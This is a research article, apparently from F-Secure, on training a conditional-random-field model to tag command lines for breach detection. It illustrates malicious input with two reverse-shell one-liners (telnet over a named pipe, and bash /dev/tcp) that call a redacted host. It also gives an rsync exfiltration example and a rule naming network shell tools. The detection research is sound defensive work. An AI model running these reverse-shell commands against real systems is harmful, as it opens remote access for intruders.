Operations on computer systems frequently use the command line. Applications perform simple tasks (such as software updates) via tools or scripts, sysadmins deploy jobs that run on multiple machines, and technical users spend a great deal of their time in console windows. Adversaries also heavily utilize the command line. Once a system has been compromised, an attacker will perform the majority of their actions at the command line using built-in system tools. This strategy benefits the attacker, since their actions will look very similar to other normal tasks performed on the system. Methodology designed to automatically detect whether a system has been compromised needs to be able to tell the difference between benign and malicious command line operations. In order to build mechanisms capable of classifying command lines in this way, we first need to understand what they do – in other words, we need to be able to parse them in a similar way to how we parse natural languages. This article describes the process we’ve been using to develop methodology capable of parsing and categorizing command lines at F-Secure.
In order to understand the problem space, we must first examine both benign and malicious command lines to get an idea of how we might want to parse them. We started this process by examining data collected by our own breach detection systems. Here are a few examples from that dataset that illustrate some of the structures we’d need to parse.
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 10.10.x.x 8080 > f
The command line operation above establishes a remote shell on the machine it was run on. A remote shell is a process that creates an outgoing connection to a command-and-control (C&C) server (in this case, the computer at 10.10.x.x). Once the connection has been established, an adversary can remotely access the compromised machine and perform actions on it. This type of command line operation is almost always a sign of malicious activity. The next example achieves the same result using bash’s built-in /dev/tcp device:
export logfile=/dev/tcp/10.10.x.x/8080; bash -i >& $logfile 0>&1
git commit -m "Init commit" -H localhost -p p4ssw0rd
The operation illustrated above is something developers will be familiar with – a commit operation to a version control system (git). However, the actual git binary doesn’t support -H or -p flags, and as such the illustrated command line was probably used to execute a different binary that had simply been renamed ‘git’. Renaming a binary in this way is great for avoiding detection – if an analyst glances over a log file, they may not immediately recognize the command as bogus.
Even if the above git command were legitimate, we may still be interested in analyzing it. For instance, if the command was run on a machine belonging to a member of the finance department, it would indicate anomalous behaviour, and warrant further investigation. Even if the command was run on a developer’s machine, it could be indicative of an attacker attempting to make changes to a company’s source code.
rsync -a --timeout=60 192.168.x.x:/var/log/checkout.log.gz /tmp/check_log/42/
The example above uses rsync – a command commonly used to copy data from one host to another. This action may be indicative of an attacker gathering data for exfiltration, even when run on a developer or sysadmin machine, or on a server – places where this type of command is commonly used.
When considering the examples above, we note that in order to programmatically determine what a command line is doing, we need to isolate relevant information such as IP addresses, ports, commands, and environment variables. We can then use that information to find uncommon commands, uncommon or invalid flags and flag values, and uncommon parameters. This information can also be used to determine whether a command line exhibits unusual behaviour, uses commands that are rarely or never seen, or uses executables in uncommon ways.
Although it is technically possible to build a set of regular expressions to parse useful information from command lines, such an endeavour would be rather inefficient, and wouldn’t scale well. Writing and maintaining large numbers of regular expressions to parse the variety of common command line structures seen on a daily basis would take a great deal of time and effort. Thus, approaching this problem using modern natural language processing (NLP) techniques seems rational.
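To make the limitation concrete, here is a minimal sketch (our own illustration, not part of any production system) of a regex that extracts host:port endpoints from raw command lines – it works on the easy cases, but also misfires on tokens that merely look like endpoints, and every new structure would need yet another hand-written pattern:

```python
import re

# Naive pattern for "host:port" style endpoints: either a dotted-quad IP
# or a hostname-like token, followed by ":" and up to five digits.
ENDPOINT = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}|[\w.-]+):(\d{1,5})")

def extract_endpoints(cmdline):
    """Pull (host, port) pairs out of a raw command line string."""
    return ENDPOINT.findall(cmdline)

# Works on the obvious case...
print(extract_endpoints("telnet 10.10.1.2:8080"))
# ...but also "finds" an endpoint in a plain file name (false positive).
print(extract_endpoints("scp backup:2020.tar host"))
```

The second call illustrates the brittleness: a file named `backup:2020.tar` matches the same pattern as a genuine endpoint, and fixing that requires more special cases – the maintenance burden the article refers to.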
Modern NLP frameworks, such as spaCy, can be used to parse and tag documents (text written in a natural language such as English). A sentence is first tokenized (split into words), and then fed into a model that makes predictions about each word, given its context in the sentence. The model’s outputs can include several different types of prediction. One commonly used prediction is a part of speech (POS) tag indicating the word type (noun, verb, adjective, etc).
NLP models can also perform named entity recognition (NER), which is used to label “real-world” objects such as people, companies, values, or locations – such as Sebastian Thrun, Google, and 2007 in the following example.
It is possible to create powerful tools using the output of modern NLP models. Such tools can be used to identify patterns in POS tags, search for occurrences of named entities, and can also be used to create sentence dependency graphs (as depicted below).
A model that is able to parse command lines in the same way that spaCy parses natural language would be extremely useful for cyber security purposes. The output of such a model would enable the creation of powerful rules for the detection of command line patterns indicative of malicious actions, and could be fed into downstream mechanisms such as statistical models, sequential models, or clustering algorithms.
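As a sketch of what such a rule might look like, the snippet below matches a simple pattern over hypothetical model output. The tag names (EXECUTABLE, IP, PORT) and the rule itself are illustrative assumptions of ours, not the article’s actual tag scheme:

```python
# Hypothetical (token, named-entity tag) output for the telnet
# reverse-shell example shown earlier in the article.
tagged = [
    ("telnet", "EXECUTABLE"),
    ("10.10.1.2", "IP"),
    ("8080", "PORT"),
]

def outbound_shell_rule(tagged_tokens):
    """Flag command lines where a known network-client executable is
    immediately followed by an IP address token."""
    net_clients = {"telnet", "nc", "ncat", "socat"}
    for (tok, tag), (_, nxt_tag) in zip(tagged_tokens, tagged_tokens[1:]):
        if tag == "EXECUTABLE" and tok in net_clients and nxt_tag == "IP":
            return True
    return False

print(outbound_shell_rule(tagged))  # True
```

Because the rule operates on tags rather than raw strings, it stays readable and survives superficial changes to the command line (different IPs, extra flags) that would defeat a literal string match.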
Unfortunately for us, readily available NLP models are specifically trained to parse natural languages – not command lines or scripting languages. For this reason, we decided to create our own. Our proposed model should be capable of labelling features from command lines with part-of-speech and named entity tags (as depicted below).
In order to train such a model, we first needed to collect a large enough set of relevant command lines. This task wasn’t as easy as it seemed – looking through anonymized data collected by our own systems, we noticed that many command lines were irrelevant. Some contained errors (anyone who uses the command line can attest to the fact that the commands we enter often contain typos or are invalid due to incorrect construction). Others contained unknown commands or proprietary executables – we couldn’t tell what they would do if executed, and thus labelling them would be troublesome. Building a representative set of command lines from the data we had available required us to manually remove irrelevant entries. We augmented our own data with the nl2bash dataset – a set of annotated command lines collected by the researchers who published the nl2bash paper. This dataset contains approximately 10,000 bash one-liners collected from websites such as Stack Overflow, paired with English descriptions.
The next step involved determining how to tokenize command lines. Unlike with natural languages, tokenizing a command line requires more than just splitting a string on spaces and punctuation. Consider the examples below, which have been annotated with black and red bars to indicate where we’d like to tokenize sensibly. Things like regular expressions should often not be split by spaces (underlined in red in the second example), and some parameters contain additional variables that are not even delimited by a space (shown as vertical red lines in the third example).
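The quoted-argument case can be demonstrated with Python’s standard-library shlex module (a simple stand-in here – it handles shell quoting but not pipes or redirections, which is why the project itself used a full parser). This example and its command line are our own illustration:

```python
import shlex

# A find command whose -regex argument contains a space.
cmd = 'find . -regex ".*\\.log [0-9]+" -delete'

# Naive whitespace splitting cuts the quoted regex in half.
print(cmd.split())
# shlex understands shell quoting and keeps the regex as one token.
print(shlex.split(cmd))
```

The naive split produces six fragments, two of which are halves of the regex; shlex yields five tokens with the regex intact – exactly the kind of boundary a command line tokenizer has to get right.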
We opted to use bashlex, an open source Python parser for command lines, along with a few of our own rules (mostly designed to recognize specific patterns like ip_address:port_number) to tokenize our dataset. Once this step had been performed, we moved onto annotation – labelling our data. This step required quite a lot of manual work. To make this process a bit easier, we utilized doccano – an open source text annotation tool.
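A custom rule of the kind mentioned above might look like the following sketch (our own illustration of the idea, not the project’s actual code): after tokenization, any token matching the ip_address:port_number pattern is split into its components so the model can label them separately.

```python
import re

# Matches a whole token of the form ip_address:port_number.
IP_PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")

def refine(tokens):
    """Split host:port tokens so IP and port become separate tokens.

    The ":" is kept as its own token so the original command line can
    still be reconstructed from the token sequence.
    """
    out = []
    for tok in tokens:
        m = IP_PORT.match(tok)
        if m:
            out.extend([m.group(1), ":", m.group(2)])
        else:
            out.append(tok)
    return out

print(refine(["nc", "10.10.1.2:8080"]))  # ['nc', '10.10.1.2', ':', '8080']
```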
We built our annotation process as a feedback loop in which we started by annotating a subset of our collected command lines, trained a model using those annotations, used the model to annotate further samples, and then fixed the resulting output for the next pass. Here is an example of the interface, and POS tags we assigned during annotation:
Once we had assembled enough labelled samples, we trained a conditional random fields (CRF) model. A conditional random field is a statistical modelling method used for structured prediction, often applied to pattern recognition tasks. The CRF training process takes as input tokens together with features derived from each token and from its neighbouring (previous and subsequent) tokens. The model’s developer designs the feature extraction process based on their goals.
We chose a number of relevant features for both POS and NER. Some examples are shown below:
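The general shape of such a feature extractor, in the style of the python-crfsuite tutorials, is sketched below. The specific features here (flag prefix, digits, path separators, a one-token context window) are illustrative choices of ours, not the article’s actual feature set:

```python
def token_features(tokens, i):
    """Build a feature dict for tokens[i], with one token of context."""
    tok = tokens[i]
    feats = {
        "lower": tok.lower(),
        "is_flag": tok.startswith("-"),   # e.g. -a, --timeout=60
        "is_digit": tok.isdigit(),        # bare numbers (ports, sizes)
        "has_slash": "/" in tok,          # likely a filesystem path
        "position": i,
    }
    if i > 0:
        feats["prev_lower"] = tokens[i - 1].lower()
    else:
        feats["BOS"] = True               # beginning of command line
    if i < len(tokens) - 1:
        feats["next_lower"] = tokens[i + 1].lower()
    else:
        feats["EOS"] = True               # end of command line
    return feats

tokens = ["rsync", "-a", "--timeout=60", "192.168.1.5", "/tmp/"]
print(token_features(tokens, 1))
```

Each token’s feature dict (one per token) is what the CRF trainer consumes, alongside the gold-standard tag sequence.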
We chose a CRF as our model since it takes sequence context into consideration, produces explainable models, and works well even when trained on small amounts of data. We used python-crfsuite to implement the model, and trained it on approximately 2000 command lines collected from data gathered during one specific month. We then tested the model against approximately 1740 annotated command lines collected during a different month. The results are presented in the table below.
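Per-tag scores of the kind reported in the table can be computed from parallel gold and predicted tag sequences; the snippet below is a simple scoring sketch of our own (the hypothetical tag names are illustrative), not the evaluation code used in the project:

```python
from collections import Counter

def per_tag_precision_recall(gold, pred):
    """Return {tag: (precision, recall)} for parallel tag sequences."""
    tp, fp, fn = Counter(), Counter(), Counter()
    for g, p in zip(gold, pred):
        if g == p:
            tp[g] += 1
        else:
            fp[p] += 1   # predicted p where it wasn't
            fn[g] += 1   # missed a true g
    scores = {}
    for tag in set(gold) | set(pred):
        prec = tp[tag] / (tp[tag] + fp[tag]) if tp[tag] + fp[tag] else 0.0
        rec = tp[tag] / (tp[tag] + fn[tag]) if tp[tag] + fn[tag] else 0.0
        scores[tag] = (prec, rec)
    return scores

gold = ["EXE", "FLAG", "IP", "IP"]
pred = ["EXE", "FLAG", "IP", "FLAG"]
print(per_tag_precision_recall(gold, pred))
```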
Our model shows a great deal of promise. Interestingly, it found errors in our own hand-annotated data that were most likely introduced during the annotation process (labelling is a rather tedious process that can quickly fatigue whoever is doing it). Here’s an example of some real-world usage:
This research represents a solid foundational precursor for command-line-based attack detection methods. The output of our model can be used to craft simple, readable rules for detecting specific types of command line activity, and can be used as input to other machine learning models and mechanisms. We plan to publish further articles on this topic as our research in this area proceeds.
This research was conducted by Zuzanna Kunik, Zuzanna Kocur, Julia Będziechowska, Bartosz Nawrotek, Paweł Piasecki, Marcin Kowiel from F-Secure’s office in Poznan, Poland, pictured below, and by Michael Gant from F-Secure’s office in Johannesburg, Republic of South Africa. We would like to especially thank Filip Olszak from Countercept Detection Response Team for consulting during the project.
This research was presented at PyData Warsaw 2019. A video of the presentation can be found here: https://www.youtube.com/watch?v=_rEjSDPHxJY
This research is part of F-Secure’s Project Blackfin – a multi-year research effort aimed at investigating how to apply collective intelligence in the cyber security domain. You can learn more about it here: https://www.f-secure.com/en/about-us/research/project-blackfin